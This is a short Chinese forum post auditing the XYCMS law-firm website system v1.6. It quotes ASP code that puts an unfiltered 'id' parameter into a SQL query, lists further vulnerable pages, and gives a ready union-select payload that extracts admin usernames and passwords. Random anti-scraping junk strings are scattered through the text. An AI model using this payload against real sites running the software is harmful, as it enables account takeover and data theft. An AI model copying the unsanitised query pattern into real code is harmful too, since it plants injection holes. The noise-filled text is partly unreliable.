前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, Z: f) \! H" j2 \
" z1 K9 Z2 Y3 y0 N淫荡分割线
* k" m W( p# m--------------------------------------------------------
M* }' Q* h' k+ u4 U9 K
- S8 m' u1 ~+ ?6 Z# {& A' [- V审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
) ^" K& }# ^; M% D& _# r2 E' U源码地址:http://down.chinaz.com/soft/29233.htm: I0 I' h# @* O, }# V! V( \( V
% a1 V, g: d/ Z- C+ g, x
漏洞文件:shownews.asp4 x3 e7 ?. a W: r$ o/ P( ?
漏洞代码:7-13行0 e! n' z# L+ A2 V% B- J' _; F
4 Y" |$ v# }( w- R; }7 h t
: `/ ~1 q& Y2 T2 g- I" f- L: k$ Y<%
0 [3 \# ~* |6 B6 f2 o' fid=request.QueryString("id") T4 @5 ]( \& m( A7 d% H8 A
# t3 }. v+ R! ?9 E: U+ v# W! n7 E
set snews=server.createobject("adodb.recordset")
) J5 B; ^: C% V* V+ F: _2 yexec="select * from [news] where id="&id
; B. N6 d; U7 Qsnews.open exec,conn,1,1
3 E9 h& _- h7 ?3 E2 u%>
/ M6 P8 l& K P3 I) r0 B
! ^8 J/ J$ E) I1 {* S 7 m$ ]6 K2 E9 K- i
什么过滤都没有 直造成注入. C0 i5 o' w& _- @: G; g, X: a0 R% M
0 I% }* }1 d. W/ z4 b
注入点:http://127.0.0.1:99/shownews.asp?id=xx
& ?, P% X: w, i
0 V6 B: A8 @7 r# `其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
, Z/ {& r9 {/ ?. c x2 u0 f $ S+ d+ h, T' @' B3 U
4 S, Q+ X8 b9 s' Z4 u9 ^5 r+ }exp: union select 1,admin,password,4,5,7 from admin_user
# U! s9 M3 ?. B/ ?( f" [& }( j
, _% e {3 s! N+ N, c |